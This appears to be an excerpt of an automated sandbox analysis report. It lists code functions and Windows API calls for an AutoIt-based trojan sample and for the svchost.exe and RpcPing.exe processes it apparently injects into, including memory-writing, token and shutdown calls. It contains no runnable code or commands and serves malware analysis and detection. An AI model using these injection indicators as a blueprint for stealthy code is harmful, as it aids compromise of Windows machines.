            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522F90 NtProtectVirtualMemory,9_2_03522F90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522FA0 NtQuerySection,9_2_03522FA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522E30 NtWriteVirtualMemory,9_2_03522E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522EA0 NtAdjustPrivilegesToken,9_2_03522EA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522D00 NtSetInformationFile,9_2_03522D00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522DB0 NtEnumerateKey,9_2_03522DB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522C00 NtQueryInformationProcess,9_2_03522C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522CC0 NtQueryVirtualMemory,9_2_03522CC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522CF0 NtOpenProcess,9_2_03522CF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03523010 NtOpenDirectoryObject,9_2_03523010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03523090 NtSetValueKey,9_2_03523090
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03523D70 NtOpenThread,9_2_03523D70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03523D10 NtOpenProcessToken,9_2_03523D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02CA8B00 NtReadFile,9_2_02CA8B00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02CA8990 NtCreateFile,9_2_02CA8990
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02CA8E10 NtAllocateVirtualMemory,9_2_02CA8E10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02CA8CB0 NtClose,9_2_02CA8CB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02CA8C00 NtDeleteFile,9_2_02CA8C00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_007B4021
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007A8858
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007B545F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0075E8000_2_0075E800
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077DBB50_2_0077DBB5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0075E0600_2_0075E060
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007D804A0_2_007D804A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007641400_2_00764140
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007724050_2_00772405
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007865220_2_00786522
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0078267E0_2_0078267E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007D06650_2_007D0665
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007668430_2_00766843
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077283A0_2_0077283A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007889DF0_2_007889DF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00768A0E0_2_00768A0E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007D0AE20_2_007D0AE2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00786A940_2_00786A94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B8B130_2_007B8B13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007AEB070_2_007AEB07
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077CD610_2_0077CD61
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007870060_2_00787006
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0076710E0_2_0076710E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007631900_2_00763190
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007512870_2_00751287
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007733C70_2_007733C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077F4190_2_0077F419
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007716C40_2_007716C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007656800_2_00765680
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007778D30_2_007778D3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007658C00_2_007658C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00771BB80_2_00771BB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00789D050_2_00789D05
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0075FE400_2_0075FE40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077BFE60_2_0077BFE6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00771FD00_2_00771FD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_036C36100_2_036C3610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028502_2_00402850
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100032_2_00410003
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E8232_2_0042E823
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012502_2_00401250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102232_2_00410223
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E29C2_2_0040E29C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2A32_2_0040E2A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033002_2_00403300
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024402_2_00402440
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416D0E2_2_00416D0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416D132_2_00416D13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025F12_2_004025F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026002_2_00402600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC02C02_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF41A22_2_03CF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD20002_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE44202_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBEFA02_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE2F302_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDCD1F2_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C856302_2_03C85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D095C32_2_03D095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD22_2_03C03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD52_2_03C03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AA3529_2_035AA352
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035B03E69_2_035B03E6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034FE3F09_2_034FE3F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035902749_2_03590274
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035702C09_2_035702C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035781589_2_03578158
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0358A1189_2_0358A118
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034E01009_2_034E0100
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A81CC9_2_035A81CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035B01AA9_2_035B01AA
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A41A29_2_035A41A2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035820009_2_03582000
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035147509_2_03514750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F07709_2_034F0770
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034EC7C09_2_034EC7C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0350C6E09_2_0350C6E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F05359_2_034F0535
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035B05919_2_035B0591
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A24469_2_035A2446
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035944209_2_03594420
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0359E4F69_2_0359E4F6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AAB409_2_035AAB40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A6BD79_2_035A6BD7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034EEA809_2_034EEA80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035069629_2_03506962
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F29A09_2_034F29A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035BA9A69_2_035BA9A6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F28409_2_034F2840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034FA8409_2_034FA840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0351E8F09_2_0351E8F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034D68B89_2_034D68B8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03564F409_2_03564F40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03510F309_2_03510F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03592F309_2_03592F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03532F289_2_03532F28
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034E2FC89_2_034E2FC8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034FCFE09_2_034FCFE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0356EFA09_2_0356EFA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F0E599_2_034F0E59
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AEE269_2_035AEE26
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AEEDB9_2_035AEEDB
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03502E909_2_03502E90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035ACE939_2_035ACE93
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0358CD1F9_2_0358CD1F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034FAD009_2_034FAD00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034EADE09_2_034EADE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03508DBF9_2_03508DBF
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F0C009_2_034F0C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034E0CF29_2_034E0CF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03590CB59_2_03590CB5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034DD34C9_2_034DD34C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A132D9_2_035A132D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0353739A9_2_0353739A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0350B2C09_2_0350B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035912ED9_2_035912ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F52A09_2_034F52A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035BB16B9_2_035BB16B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0352516C9_2_0352516C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034DF1729_2_034DF172
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034FB1B09_2_034FB1B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F70C09_2_034F70C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0359F0CC9_2_0359F0CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A70E99_2_035A70E9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AF0E09_2_035AF0E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AF7B09_2_035AF7B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035356309_2_03535630
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A16CC9_2_035A16CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A75719_2_035A7571
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035B95C39_2_035B95C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0358D5B09_2_0358D5B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034E14609_2_034E1460
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AF43F9_2_035AF43F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AFB769_2_035AFB76
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03565BF09_2_03565BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0352DBF99_2_0352DBF9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0350FB809_2_0350FB80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AFA499_2_035AFA49
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A7A469_2_035A7A46
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03563A6C9_2_03563A6C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0359DAC69_2_0359DAC6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03535AA09_2_03535AA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0358DAAC9_2_0358DAAC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03591AA39_2_03591AA3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0350B9509_2_0350B950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F99509_2_034F9950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035859109_2_03585910
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0355D8009_2_0355D800
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F38E09_2_034F38E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AFF099_2_035AFF09
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034B3FD29_2_034B3FD2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034B3FD59_2_034B3FD5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F1F929_2_034F1F92
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AFFB19_2_035AFFB1
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F9EB09_2_034F9EB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A1D5A9_2_035A1D5A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034F3D409_2_034F3D40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035A7D739_2_035A7D73
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0350FDC09_2_0350FDC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03569C329_2_03569C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035AFCF29_2_035AFCF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C91B109_2_02C91B10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8CA909_2_02C8CA90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8CCB09_2_02C8CCB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8AD299_2_02C8AD29
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8AD309_2_02C8AD30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02CAB2B09_2_02CAB2B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9379B9_2_02C9379B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C937A09_2_02C937A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0329E3A89_2_0329E3A8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0329E4C39_2_0329E4C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0329E85D9_2_0329E85D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_0329D8C89_2_0329D8C8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
